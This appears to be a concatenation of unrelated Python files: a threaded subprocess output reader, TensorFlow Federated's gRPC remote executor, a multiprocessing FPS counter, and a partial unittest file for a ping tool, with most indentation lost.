required to read the output as it is emitted by the subprocess in real-time
or else it would block until the subprocess had ended.
"""
io_q = queue.Queue(5)
threads = {
"stdout": threading.Thread(
target=read_stream, args=("stdout", process.stdout, io_q)
),
"stderr": threading.Thread(
target=read_stream, args=("stderr", process.stderr, io_q)
),
}
# Unfortunately, stdout and stderr are not synchronised with each other.
# This makes capturing both for real-time processing useless. So it is
# currently all captured under stdout. Even more unfortunately, stderr
# comes through first before stdout. This means writes that are made first
# to stdout will not be first through the pipe if there is stderr output.
#
# This lack of synchronisation between stdout and stderr output makes
# real-time display useless because they aren't captured and passed
# through to the handler as they are encountered.
#
# Worse still, there appear to be issues with subprocess output capture on
# Windows.
#
# A proper resolution would be to provide a custom subprocess module but
# since the common usage does not require real-time capture of
# stdout/stderr, this is not worth the effort. Manually running whatever
# was intended for the subprocess outside ttt is the only recourse.
#
for thread in threads.values():
thread.start()
stdout = []
stderr = []
while threads:
try:
item = io_q.get(True, 1)
except queue.Empty:
if process.poll() is not None:
break
else:
outstream, message = item
if message == "EXIT":
threads[outstream].join()
del threads[outstream]
else:
message = message.rstrip(os.linesep)
channel = sys.stdout if outstream == "stdout" else sys.stderr
(stdout if outstream == "stdout" else stderr).append(message)
if line_handler is not None:
line_handler(channel, message)
else:
channel.write(message)
channel.flush()
for t in threads.values():
t.join()
process.wait()
return (process.returncode, stdout, stderr)
def read_stream(stream_name, input_stream, io_q):
"""Captures lines incoming on the input stream on a queue.
This function is intended to be the function executed by a thread.
:param stream_name: the name of the stream being read
:param input_stream: the stream being read
:param io_q: the queue on to which lines from the input_stream are added.
It is intended to be a shared data structure between multiple threads of
execution (primarily between the main thread and the thread executing this
function).
"""
if not input_stream:
io_q.put((stream_name, "EXIT"))
return
for line in input_stream:
io_q.put((stream_name, line))
if not input_stream.closed:
input_stream.close()
io_q.put((stream_name, "EXIT"))
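# ---------------------------------------------------------------------------
# Illustrative usage (a minimal sketch, not part of the original module). It
# relies on the module-level imports above (os, sys, subprocess, queue,
# threading); the command and the listener below are examples only.
if __name__ == "__main__":
    captured = []

    def demo_listener(channel, message):
        # channel is sys.stdout or sys.stderr; message is one line of output
        # with the platform line end already removed.
        captured.append(message)
        channel.write(message + os.linesep)
        channel.flush()

    # universal_newlines is passed explicitly here so that lines arrive as str.
    returncode, out_lines, err_lines = call_output(
        [sys.executable, "-c", "print('hello from a subprocess')"],
        universal_newlines=True,
        listener=demo_listener,
    )
    print("exit code:", returncode, "lines captured:", len(out_lines))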
|
remote_executor.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A local proxy for a remote executor service hosted on a separate machine."""
import asyncio
import itertools
import queue
import threading
from typing import Mapping
import weakref
import absl.logging as logging
import grpc
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.common_libs import py_typecheck
from tensorflow_federated.python.common_libs import structure
from tensorflow_federated.python.common_libs import tracing
from tensorflow_federated.python.core.api import computation_types
from tensorflow_federated.python.core.impl.executors import execution_context
from tensorflow_federated.python.core.impl.executors import executor_base
from tensorflow_federated.python.core.impl.executors import executor_service_utils
from tensorflow_federated.python.core.impl.executors import executor_value_base
from tensorflow_federated.python.core.impl.types import placement_literals
_STREAM_CLOSE_WAIT_SECONDS = 10
class RemoteValue(executor_value_base.ExecutorValue):
"""A reference to a value embedded in a remotely deployed executor service."""
def __init__(self, value_ref: executor_pb2.ValueRef, type_spec, executor):
"""Creates the value.
Args:
value_ref: An instance of `executor_pb2.ValueRef` returned by the remote
executor service.
type_spec: An instance of `computation_types.Type`.
executor: The executor that created this value.
"""
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
py_typecheck.check_type(type_spec, computation_types.Type)
py_typecheck.check_type(executor, RemoteExecutor)
self._value_ref = value_ref
self._type_signature = type_spec
self._executor = executor
# Clean up the value and the memory associated with it on the remote
# worker when no references to it remain.
def finalizer(value_ref, executor):
executor._dispose(value_ref) # pylint: disable=protected-access
weakref.finalize(self, finalizer, value_ref, executor)
@property
def type_signature(self):
return self._type_signature
@tracing.trace(span=True)
async def compute(self):
return await self._executor._compute(self._value_ref) # pylint: disable=protected-access
@property
def value_ref(self):
return self._value_ref
class _BidiStream:
"""A bidi stream connection to the Executor service's Execute method."""
def __init__(self, stub, thread_pool_executor):
self._stub = stub
self._thread_pool_executor = thread_pool_executor
self._is_initialized = False
def _lazy_init(self):
"""Lazily initialize the underlying gRPC stream."""
if self._is_initialized:
return
logging.debug('Initializing bidi stream')
self._request_queue = queue.Queue()
self._response_event_dict = {}
self._stream_closed_event = threading.Event()
def request_iter():
"""Iterator that blocks on the request Queue."""
for seq in itertools.count():
logging.debug('Request thread: blocking for next request')
val = self._request_queue.get()
if val:
py_typecheck.check_type(val[0], executor_pb2.ExecuteRequest)
py_typecheck.check_type(val[1], threading.Event)
req = val[0]
req.sequence_number = seq
logging.debug(
'Request thread: processing request of type %s, seq_no %s',
val[0].WhichOneof('request'), seq)
self._response_event_dict[seq] = val[1]
yield val[0]
else:
logging.debug(
'Request thread: Final request received. Stream will close.')
# None means we are done processing
return
response_iter = self._stub.Execute(request_iter())
def response_thread_fn():
"""Consumes response iter and exposes the value on corresponding Event."""
try:
logging.debug('Response thread: blocking for next response')
for response in response_iter:
logging.debug(
'Response thread: processing response of type %s, seq_no %s',
response.WhichOneof('response'), response.sequence_number)
# Get the corresponding response Event
response_event = self._response_event_dict[response.sequence_number]
# Attach the response as an attribute on the Event
response_event.response = response
response_event.set()
# Set the event indicating the stream has been closed
self._stream_closed_event.set()
except grpc.RpcError as error:
logging.exception('Error calling remote executor: %s', error)
response_thread = threading.Thread(target=response_thread_fn)
response_thread.daemon = True
response_thread.start()
self._is_initialized = True
@tracing.trace(span=True)
async def send_request(self, request):
"""Send a request on the bidi stream."""
self._lazy_init()
py_typecheck.check_type(request, executor_pb2.ExecuteRequest)
request_type = request.WhichOneof('request')
response_event = threading.Event()
# Enqueue a tuple of request and an Event used to return the response
self._request_queue.put((request, response_event))
await asyncio.get_event_loop().run_in_executor(self._thread_pool_executor,
response_event.wait)
response = response_event.response # pytype: disable=attribute-error
if isinstance(response, Exception):
raise response
py_typecheck.check_type(response, executor_pb2.ExecuteResponse)
response_type = response.WhichOneof('response')
if response_type != request_type:
raise ValueError('Request had type: {} but response had type: {}'.format(
request_type, response_type))
return response
def close(self):
if self._is_initialized:
logging.debug('Closing bidi stream')
self._request_queue.put(None)
# Wait for the stream to be closed
self._stream_closed_event.wait(_STREAM_CLOSE_WAIT_SECONDS)
else:
logging.debug('Closing unused bidi stream')
self._is_initialized = False
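# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module) of the request/response
# correlation pattern used by _BidiStream above: each request is paired with a
# threading.Event keyed by its sequence number; the consumer thread attaches
# the response to that Event and sets it so the waiting sender can resume.
# The queue contents and the fake "response" below are examples only.
def _bidi_correlation_sketch():
  pending = {}
  request_queue = queue.Queue()

  def send(seq, payload):
    done = threading.Event()
    pending[seq] = done
    request_queue.put((seq, payload))
    return done  # the caller waits on `done`, then reads `done.response`

  def consumer():
    seq, payload = request_queue.get()
    done = pending.pop(seq)
    done.response = payload.upper()  # stand-in for the real RPC response
    done.set()

  threading.Thread(target=consumer, daemon=True).start()
  event = send(0, 'ping')
  event.wait(timeout=1)
  return getattr(event, 'response', None)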
def _request(rpc_func, request):
with tracing.wrap_rpc_in_trace_context():
try:
return rpc_func(request)
except grpc.RpcError as e:
if _is_retryable_grpc_error(e):
logging.info('Received retryable gRPC error: %s', e)
raise execution_context.RetryableError(e)
else:
raise
def _is_retryable_grpc_error(error):
"""Predicate defining what is a retryable gRPC error."""
non_retryable_errors = {
grpc.StatusCode.INVALID_ARGUMENT,
grpc.StatusCode.NOT_FOUND,
grpc.StatusCode.ALREADY_EXISTS,
grpc.StatusCode.PERMISSION_DENIED,
grpc.StatusCode.FAILED_PRECONDITION,
grpc.StatusCode.ABORTED,
grpc.StatusCode.OUT_OF_RANGE,
grpc.StatusCode.UNIMPLEMENTED,
grpc.StatusCode.DATA_LOSS,
grpc.StatusCode.UNAUTHENTICATED,
}
return (isinstance(error, grpc.RpcError) and
error.code() not in non_retryable_errors)
class RemoteExecutor(executor_base.Executor):
"""The remote executor is a local proxy for a remote executor instance."""
# TODO(b/134543154): Switch to using an asynchronous gRPC client so we don't
# have to block on all those calls.
def __init__(self,
channel,
rpc_mode='REQUEST_REPLY',
thread_pool_executor=None,
dispose_batch_size=20):
"""Creates a remote executor.
Args:
channel: An instance of `grpc.Channel` to use for communication with the
remote executor service.
rpc_mode: Optional mode of calling the remote executor. Must be either
'REQUEST_REPLY' or 'STREAMING' (defaults to 'REQUEST_REPLY'). This
option will be removed after the request-reply interface is deprecated.
thread_pool_executor: Optional concurrent.futures.Executor used to wait
for the reply to a streaming RPC message. Uses the default Executor if
not specified.
dispose_batch_size: The batch size for requests to dispose of remote
worker values. Lower values will result in more requests to the remote
worker, but will result in values being cleaned up sooner and therefore
may result in lower memory usage on the remote worker.
"""
py_typecheck.check_type(channel, grpc.Channel)
py_typecheck.check_type(rpc_mode, str)
py_typecheck.check_type(dispose_batch_size, int)
if rpc_mode not in ['REQUEST_REPLY', 'STREAMING']:
raise ValueError('Invalid rpc_mode: {}'.format(rpc_mode))
logging.debug('Creating new ExecutorStub with RPC_MODE=%s', rpc_mode)
self._stub = executor_pb2_grpc.ExecutorStub(channel)
self._bidi_stream = None
self._dispose_batch_size = dispose_batch_size
self._dispose_request = executor_pb2.DisposeRequest()
if rpc_mode == 'STREAMING':
logging.debug('Creating Bidi stream')
self._bidi_stream = _BidiStream(self._stub, thread_pool_executor)
def close(self):
if self._bidi_stream is not None:
logging.debug('Closing bidi stream')
self._bidi_stream.close()
def _dispose(self, value_ref: executor_pb2.ValueRef):
"""Disposes of the remote value stored on the worker service."""
self._dispose_request.value_ref.append(value_ref)
if len(self._dispose_request.value_ref) < self._dispose_batch_size:
return
dispose_request = self._dispose_request
self._dispose_request = executor_pb2.DisposeRequest()
if self._bidi_stream is None:
_request(self._stub.Dispose, dispose_request)
else:
send_request_fut = self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(dispose=dispose_request))
# We don't care about the response, and so don't bother to await it.
# Just start it as a task so that it runs at some point.
asyncio.get_event_loop().create_task(send_request_fut)
@tracing.trace(span=True)
async def set_cardinalities(
self, cardinalities: Mapping[placement_literals.PlacementLiteral, int]):
serialized_cardinalities = executor_service_utils.serialize_cardinalities(
cardinalities)
request = executor_pb2.SetCardinalitiesRequest(
cardinalities=serialized_cardinalities)
if self._bidi_stream is None:
_request(self._stub.SetCardinalities, request)
else:
await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(set_cardinalities=request))
return
@tracing.trace(span=True)
async def create_value(self, value, type_spec=None):
@tracing.trace
def serialize_value():
return executor_service_utils.serialize_value(value, type_spec)
value_proto, type_spec = serialize_value()
create_value_request = executor_pb2.CreateValueRequest(value=value_proto)
if self._bidi_stream is None:
response = _request(self._stub.CreateValue, create_value_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_value=create_value_request)
)).create_value
py_typecheck.check_type(response, executor_pb2.CreateValueResponse)
return RemoteValue(response.value_ref, type_spec, self)
@tracing.trace(span=True)
async def create_call(self, comp, arg=None):
py_typecheck.check_type(comp, RemoteValue)
py_typecheck.check_type(comp.type_signature, computation_types.FunctionType)
if arg is not None:
py_typecheck.check_type(arg, RemoteValue)
create_call_request = executor_pb2.CreateCallRequest(
function_ref=comp.value_ref,
argument_ref=(arg.value_ref if arg is not None else None))
if self._bidi_stream is None:
response = _request(self._stub.CreateCall, create_call_request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_call=create_call_request)
)).create_call
py_typecheck.check_type(response, executor_pb2.CreateCallResponse)
return RemoteValue(response.value_ref, comp.type_signature.result, self)
@tracing.trace(span=True)
async def create_struct(self, elements):
constructed_anon_tuple = structure.from_container(elements)
proto_elem = []
type_elem = []
for k, v in structure.iter_elements(constructed_anon_tuple):
py_typecheck.check_type(v, RemoteValue)
proto_elem.append(
executor_pb2.CreateStructRequest.Element(
name=(k if k else None), value_ref=v.value_ref))
type_elem.append((k, v.type_signature) if k else v.type_signature)
result_type = computation_types.StructType(type_elem)
request = executor_pb2.CreateStructRequest(element=proto_elem)
if self._bidi_stream is None:
response = _request(self._stub.CreateStruct, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_struct=request))).create_struct
py_typecheck.check_type(response, executor_pb2.CreateStructResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def create_selection(self, source, index=None, name=None):
py_typecheck.check_type(source, RemoteValue)
py_typecheck.check_type(source.type_signature, computation_types.StructType)
if index is not None:
py_typecheck.check_type(index, int)
py_typecheck.check_none(name)
result_type = source.type_signature[index]
else:
py_typecheck.check_type(name, str)
result_type = getattr(source.type_signature, name)
request = executor_pb2.CreateSelectionRequest(
source_ref=source.value_ref, name=name, index=index)
if self._bidi_stream is None:
response = _request(self._stub.CreateSelection, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(create_selection=request)
)).create_selection
py_typecheck.check_type(response, executor_pb2.CreateSelectionResponse)
return RemoteValue(response.value_ref, result_type, self)
@tracing.trace(span=True)
async def _compute(self, value_ref):
py_typecheck.check_type(value_ref, executor_pb2.ValueRef)
request = executor_pb2.ComputeRequest(value_ref=value_ref)
if self._bidi_stream is None:
response = _request(self._stub.Compute, request)
else:
response = (await self._bidi_stream.send_request(
executor_pb2.ExecuteRequest(compute=request))).compute
py_typecheck.check_type(response, executor_pb2.ComputeResponse)
value, _ = executor_service_utils.deserialize_value(response.value)
return value
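# ---------------------------------------------------------------------------
# Illustrative usage (a minimal sketch, not part of the original module). The
# service address, the insecure channel and the cardinality value below are
# assumptions for the example only, and a remote executor service is assumed
# to be listening there; a real deployment would typically use a secure
# channel and be driven by an execution context rather than called directly.
if __name__ == '__main__':
  import concurrent.futures

  async def _demo():
    channel = grpc.insecure_channel('localhost:8000')
    executor = RemoteExecutor(
        channel,
        rpc_mode='STREAMING',
        thread_pool_executor=concurrent.futures.ThreadPoolExecutor(max_workers=1))
    try:
      # Tell the remote service how many clients this executor represents.
      await executor.set_cardinalities({placement_literals.CLIENTS: 3})
    finally:
      executor.close()

  asyncio.get_event_loop().run_until_complete(_demo())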
|
mpfps.py
|
import multiprocessing
import logging
import time
import sys
import numpy as np
import threading
from lib.mpvariable import MPVariable
import types
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
import copy_reg
elif PY3:
import copyreg as copy_reg
def _pickle_method(m):
    if PY2:
        if m.im_self is None:
            return getattr, (m.im_class, m.im_func.func_name)
        return getattr, (m.im_self, m.im_func.func_name)
    return getattr, (m.__self__, m.__func__.__name__)
copy_reg.pickle(types.MethodType, _pickle_method)
class FPS():
def __init__(self, cfg):
self.cfg = cfg
return
def start_counter(self):
"""
Start via Process
"""
m = multiprocessing.Process(target=self.process_fps_counter, args=())
m.start()
return m
def start_console(self):
"""
Start via Process
"""
m = multiprocessing.Process(target=self.process_fps_console, args=())
m.start()
return m
def process_fps_counter(self):
"""
        frame_counter.value: frame counter value shared between processes.
        Updates the FPS statistics every 0.2 sec (snapshot_interval).
"""
logging.debug("enter")
FPS_INTERVAL = self.cfg['fps_interval']
DEBUG_MODE = self.cfg['debug_mode']
MAX_VIS_FPS = self.cfg['max_vis_fps']
        sleep_interval = 1.0 / 50.0 # Wake up and check the time N times per second.
        snapshot_interval = 1.0 / 5.0 # Calculate FPS N times per second (snapshot_interval must be >= sleep_interval).
        fps_stream_length = FPS_INTERVAL # Length of the FPS stream in seconds. FPS is the number of frames processed per second during this most recent window.
fps_stream = [] # Array of fps_snapshot during fps_stream_length
snapshot = None # One array (frames_in_interval, interval_seconds, unixtime) per snapshot_interval
vis_fps_stream = []
vis_snapshot = None
if DEBUG_MODE:
""" FOR PERFORMANCE DEBUG """
snapshot_fps = 0
min_snapshot_fps = 10000
max_snapshot_fps = 0
min_snapshot_list = []
max_snapshot_list = []
""" """
try:
launch_time = time.time()
while MPVariable.running.value and MPVariable.frame_counter.value == 0:
time.sleep(sleep_interval)
MPVariable.first_complete_time.value = time.time() - launch_time
print("Time to first image:{}".format(MPVariable.first_complete_time.value))
previos_work_time = time.time()
while MPVariable.running.value:
time.sleep(sleep_interval)
now_time = time.time()
if now_time >= previos_work_time + snapshot_interval:
### FPS update by snapshot_interval ###
snapshot_frames = MPVariable.frame_counter.value
MPVariable.frame_counter.value = 0
vis_snapshot_frames = MPVariable.vis_frame_counter.value
MPVariable.vis_frame_counter.value = 0
"""
FPS stream
"""
snapshot_seconds = now_time - previos_work_time
snapshot = (snapshot_frames, snapshot_seconds, now_time)
fps_stream += [snapshot]
vis_snapshot = (vis_snapshot_frames, snapshot_seconds, now_time)
vis_fps_stream += [vis_snapshot]
if DEBUG_MODE:
"""
FOR PERFORMANCE DEBUG
FPS snapshot calculation
"""
snapshot_fps = snapshot_frames/snapshot_seconds
MPVariable.fps_snapshot.value = snapshot_fps # FPS of snapshot. for visualize
if min_snapshot_fps >= snapshot_fps:
min_snapshot_fps = snapshot_fps
min_snapshot_list += [snapshot_fps]
print("min_snapshot:{:.1f} {}".format(snapshot_fps, snapshot))
if max_snapshot_fps <= snapshot_fps:
max_snapshot_fps = snapshot_fps
max_snapshot_list += [snapshot_fps]
print("max_snapshot:{:.1f} {}".format(snapshot_fps, snapshot))
""" """
"""
PROC FPS
"""
while MPVariable.running.value:
(min_frame, min_seconds, min_time) = fps_stream[0]
if now_time - min_time > fps_stream_length:
"""
drop old snapshot
"""
fps_stream.pop(0)
else:
"""
goto FPS streaming calculation
"""
break
if(len(fps_stream) > 0):
"""
FPS streaming calculation
count frames and seconds in stream
"""
np_fps_stream = np.array(fps_stream)
np_fps_stream = np_fps_stream[:,:2] # take frames, seconds. drop unixtime.
                        np_fps = np.sum(np_fps_stream, axis=0) # [total_frames, total_seconds] during fps_stream_length
"""
insert local values to shared variables
"""
MPVariable.fps_frames.value = int(np_fps[0]) # for console output
MPVariable.fps_seconds.value = np_fps[1] # for console output
MPVariable.fps.value = np_fps[0]/np_fps[1] # for visualize and console
else:
MPVariable.fps_frames.value = 0
                        MPVariable.fps_seconds.value = -1 # marks a too-slow FPS check; if -1 sec appears, fps_stream_length should be set to a longer time.
MPVariable.fps.value = 0
"""
VIS FPS
"""
while MPVariable.running.value:
(min_frame, min_seconds, min_time) = vis_fps_stream[0]
if now_time - min_time > fps_stream_length:
"""
drop old snapshot
"""
vis_fps_stream.pop(0)
else:
"""
goto FPS streaming calculation
"""
break
if(len(vis_fps_stream) > 0):
"""
FPS streaming calculation
count frames and seconds in stream
"""
np_fps_stream = np.array(vis_fps_stream)
np_fps_stream = np_fps_stream[:,:2] # take frames, seconds. drop unixtime.
                        np_fps = np.sum(np_fps_stream, axis=0) # [total_frames, total_seconds] during fps_stream_length
"""
insert local values to shared variables
"""
MPVariable.vis_fps_frames.value = int(np_fps[0]) # for console output
MPVariable.vis_fps.value = np_fps[0]/np_fps[1] # for visualize and console
if MAX_VIS_FPS <= 0:
MPVariable.vis_skip_rate.value = 0
else:
rate = MPVariable.fps.value/MAX_VIS_FPS
MPVariable.vis_skip_rate.value = rate
else:
MPVariable.vis_fps_frames.value = 0
MPVariable.vis_fps.value = 0
MPVariable.vis_skip_rate.value = 0
previos_work_time = now_time
except KeyboardInterrupt:
pass
except Exception as e:
import traceback
traceback.print_exc()
finally:
MPVariable.running.value = False
if DEBUG_MODE:
print("min_snapshot_fps:{:.1f}".format(min_snapshot_fps))
print("{}".format(min_snapshot_list))
print("max_snapshot_fps:{:.1f}".format(max_snapshot_fps))
print("{}".format(max_snapshot_list))
return
def process_fps_console(self):
"""
        Print FPS every fps_interval seconds.
"""
logging.debug("enter")
FPS_INTERVAL = self.cfg['fps_interval']
DEBUG_MODE = self.cfg['debug_mode']
SPLIT_MODEL = self.cfg['split_model']
sleep_interval = 1.0 / 50.0 # Wakeup and time checks N times per sec.
try:
while MPVariable.running.value and MPVariable.frame_counter.value == 0:
time.sleep(sleep_interval)
previos_work_time = time.time()
while MPVariable.running.value:
time.sleep(sleep_interval)
now_time = time.time()
if now_time >= previos_work_time + FPS_INTERVAL:
"""
FPS console by fps_interval
"""
frames = MPVariable.fps_frames.value
seconds = MPVariable.fps_seconds.value
if frames == 0:
total = 0
cap = 0
worker = 0
gpu = 0
cpu = 0
lost = 0
else:
total = MPVariable.total_proc_time.value/frames
cap = MPVariable.cap_proc_time.value/frames
                        worker = MPVariable.worker_proc_time.value/frames
gpu = MPVariable.gpu_proc_time.value/frames
cpu = MPVariable.cpu_proc_time.value/frames
lost = MPVariable.lost_proc_time.value/frames
print("FPS:{: ^5.1f} Frames:{: ^3} Seconds:{: ^10.5f} | 1FRAME total:{: ^10.5f} cap:{: ^10.5f} worker:{: ^10.5f} gpu:{: ^10.5f} cpu:{: ^10.5f} lost:{: ^10.5f} send:{: ^10.5f} | VFPS:{: ^5.1f} VFrames:{: ^3} VDrops:{: ^3}"
.format(MPVariable.fps.value, MPVariable.fps_frames.value, MPVariable.fps_seconds.value,
total,
cap,
worker,
gpu,
cpu,
lost,
MPVariable.send_proc_time.value,
MPVariable.vis_fps.value, MPVariable.vis_fps_frames.value, MPVariable.vis_drop_frames.value))
MPVariable.cap_proc_time.value = 0
MPVariable.worker_proc_time.value = 0
MPVariable.gpu_proc_time.value = 0
MPVariable.cpu_proc_time.value = 0
MPVariable.lost_proc_time.value = 0
MPVariable.total_proc_time.value = 0
MPVariable.vis_proc_time.value = 0
MPVariable.vis_drop_frames.value = 0
previos_work_time = now_time
except KeyboardInterrupt:
pass
except Exception as e:
import traceback
traceback.print_exc()
finally:
MPVariable.running.value = False
print("Time to first image:{}".format(MPVariable.first_complete_time.value))
return
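# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module) of the sliding-window
# FPS calculation implemented in process_fps_counter above: keep a list of
# (frames, seconds, unixtime) snapshots, drop the ones that fall outside the
# window, then sum the remaining frames and seconds with numpy.
def _sliding_window_fps(fps_stream, now_time, window_seconds):
    # Drop snapshots whose timestamp is older than the window.
    while fps_stream and now_time - fps_stream[0][2] > window_seconds:
        fps_stream.pop(0)
    if not fps_stream:
        return 0.0
    np_stream = np.array(fps_stream)[:, :2]  # keep frames and seconds, drop unixtime
    total_frames, total_seconds = np.sum(np_stream, axis=0)
    return total_frames / total_seconds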
|
test___init__.py
|
'''cping.protocols tests'''
import threading
import time
import unittest
import cping.protocols
# pylint: disable=protected-access
class TestHost(unittest.TestCase):
'''cping.protocols.Host tests.'''
def test_add_result(self):
'''Add a result.'''
host = cping.protocols.Ping()('localhost')
host.add_result(1)
host.add_result(2, True)
self.assertEqual(host.results[0], {'latency': 1, 'error': False})
self.assertEqual(host.results[1], {'latency': 2, 'error': True})
def test_add_result_invalid_type_latency(self):
'''Add a result with an invalid latency type.'''
host = cping.protocols.Ping()('localhost')
with self.assertRaisesRegex(TypeError, 'latency must be a float'):
host.add_result('hi')
def test_add_result_invalid_type_error(self):
'''Add a result with an invalid error type.'''
host = cping.protocols.Ping()('localhost')
with self.assertRaisesRegex(TypeError, 'error must be a boolean'):
host.add_result(1, 1)
def test_is_running(self):
'''Confirm that the host correctly detects when the loop is running.'''
host = cping.protocols.Ping()('localhost')
self.assertFalse(host.is_running())
stop = threading.Event()
host._test_thread = threading.Thread(target=stop.wait)
self.assertFalse(host.is_running())
host._test_thread.start()
self.assertTrue(host.is_running())
stop.set()
host._test_thread.join()
self.assertFalse(host.is_running())
def test_results_summary(self):
'''Get the statistics on the results.'''
host = cping.protocols.Ping()('localhost')
# All stats are None
for key, value in host.results_summary.items():
self.assertIsNone(value, msg=f'{key} is not None')
host.add_result(0.8)
self.assertEqual(host.results_summary['min'], 800)
self.assertEqual(host.results_summary['avg'], 800)
self.assertEqual(host.results_summary['max'], 800)
self.assertIs(host.results_summary['stdev'], None)
self.assertEqual(host.results_summary['loss'], 0)
host.add_result(0.6)
self.assertEqual(host.results_summary['min'], 600)
self.assertEqual(host.results_summary['avg'], 700)
self.assertEqual(host.results_summary['max'], 800)
self.assertEqual(round(host.results_summary['stdev'], 3), 141.421)
self.assertEqual(host.results_summary['loss'], 0)
host.add_result(-1)
self.assertEqual(host.results_summary['min'], 600)
self.assertEqual(host.results_summary['avg'], 700)
self.assertEqual(host.results_summary['max'], 800)
self.assertEqual(round(host.results_summary['stdev'], 3), 141.421)
self.assertEqual(round(host.results_summary['loss'], 3), 0.333)
def test_set_results_length(self):
'''Change the results length.'''
host = cping.protocols.Ping()('localhost')
for i in range(120):
host.add_result(i)
self.assertEqual(len(host.results),
cping.protocols.RESULTS_LENGTH_MINIMUM)
host.set_results_length(120)
for i in range(120):
host.add_result(i)
self.assertEqual(len(host.results), 120)
def test_set_results_length_invalid_type_new_length(self):
'''set_results_length with wrong new_length.'''
with self.assertRaisesRegex(TypeError, 'new_length must be an int'):
cping.protocols.Ping()('localhost').set_results_length(10.0)
def test_start(self):
'''Start host with a dummy ping_loop.'''
def dummy_ping_loop(host):
time.sleep(0.1)
host.stop_signal.set()
host = cping.protocols.Ping()('localhost')
host.protocol.ping_loop = dummy_ping_loop
host.status = 'Cleared at start'
# Confirm that start clears stop_signal
host.stop_signal.set()
host.start()
self.assertIsNone(host.status)
self.assertTrue(host.is_running())
self.assertFalse(host.stop_signal.is_set())
# Confirm that the stop signal is set
host._test_thread.join()
self.assertTrue(host.stop_signal.is_set())
def test_start_delay(self):
'''Start host with a delay on ping_loop.'''
host = cping.protocols.Ping()('localhost')
host.protocol.ping_loop = lambda host: host.stop_signal.set()
host.start(delay=0.05)
self.assertTrue(host.is_running())
self.assertFalse(host.stop_signal.is_set())
# Confirm that the stop signal is set
host._test_thread.join()
self.assertTrue(host.stop_signal.is_set())
def test_start_invalid_type_delay(self):
'''Start host with a delay of an invalid type.'''
with self.assertRaisesRegex(TypeError, 'delay must be a float'):
cping.protocols.Ping()('localhost').start(delay='hi')
def test_stop(self):
'''Ensure stop sets stop_signal and, if `block=True`, waits until
ping_loop exits.'''
def dummy_ping_loop(host):
host.stop_signal.wait()
time.sleep(0.1)
host = cping.protocols.Ping()('localhost')
host.protocol.ping_loop = dummy_ping_loop
host.start()
self.assertFalse(host.stop_signal.is_set())
self.assertTrue(host._test_thread.is_alive())
host.stop()
self.assertTrue(host.stop_signal.is_set())
self.assertTrue(host._test_thread.is_alive())
host.stop(block=True)
self.assertTrue(host.stop_signal.is_set())
self.assertFalse(host._test_thread.is_alive())
def test_invalid_type_address(self):
'''Create an instance of Host with an invalid host type.'''
with self.assertRaisesRegex(TypeError, 'address must be a string'):
cping.protocols.Host(1, None)
def test_invalid_type_protocol(self):
'''Create an instance of Host with an invalid protocol type.'''
regex = 'protocol must be an instance of cping.protocols.Ping'
with self.assertRaisesRegex(TypeError, regex):
cping.protocols.Host('localhost', None)
def test_invalid_type_status(self):
'''Host's status with invalid type.'''
host = cping.protocols.Ping()('localhost')
self.assertIs(host.status, None)
with self.assertRaisesRegex(TypeError, 'status must be a string'):
host.status = 1
def test_read_only_address(self):
'''Host's address attribute is read only.'''
host = cping.protocols.Ping()('localhost')
self.assertEqual(host.address, 'localhost')
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.address = 'hi'
def test_read_only_burst_mode(self):
'''Host's burst_mode attribute is read only.'''
host = cping.protocols.Ping()('localhost')
self.assertTrue(isinstance(host.burst_mode, threading.Event))
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.burst_mode = None
def test_read_only_protocol(self):
'''Host's protocol attribute is read only.'''
ping = cping.protocols.Ping()
host = cping.protocols.Host('localhost', ping)
self.assertIs(host.protocol, ping)
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.protocol = None
def test_read_only_read_signal(self):
'''Host's ready_signal attribute is read only.'''
host = cping.protocols.Ping()('localhost')
self.assertTrue(isinstance(host.ready_signal, threading.Event))
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.ready_signal = None
def test_read_only_results(self):
'''Host's results attribute is read only.'''
host = cping.protocols.Ping()('localhost')
# Confirm a copy is returned
self.assertIsNot(host.results, host.results)
with self.assertRaisesRegex(AttributeError, 'can.t set attribute'):
host.results = {}
def test___str__(self):
        '''Confirm Host's __str__ format.'''
self.assertEqual(str(cping.protocols.Ping()('hello')), 'hello')
class TestPing(unittest.TestCase):
'''cping.protocols.Ping tests.'''
def test_ping_loop(self):
'''Ensure ping_loop raises NotImplementedError.'''
with self.assertRaises(NotImplementedError):
cping.protocols.Ping().ping_loop(None)
def test_wait(self):
'''Timeout should account for the test latency and burst mode.'''
host = cping.protocols.Ping()('host')
# The latency is subtracted from the protocol interval
checkpoint = time.time()
host.protocol.wait(host, 0.5)
self.assertTrue(0.4 <= time.time() - checkpoint <= 0.6)
# No timeout when the ping failed (already spent the full interval)
checkpoint = time.time()
host.protocol.wait(host, -1)
self.assertLess(time.time() - checkpoint, 0.1)
# No timeout when the burst mode is enabled
checkpoint = time.time()
host.burst_mode.set()
host.protocol.wait(host, 0.5)
self.assertLess(time.time() - checkpoint, 0.1)
def test_invalid_type_interval(self):
'''Create an instance of Ping with an invalid interval type.'''
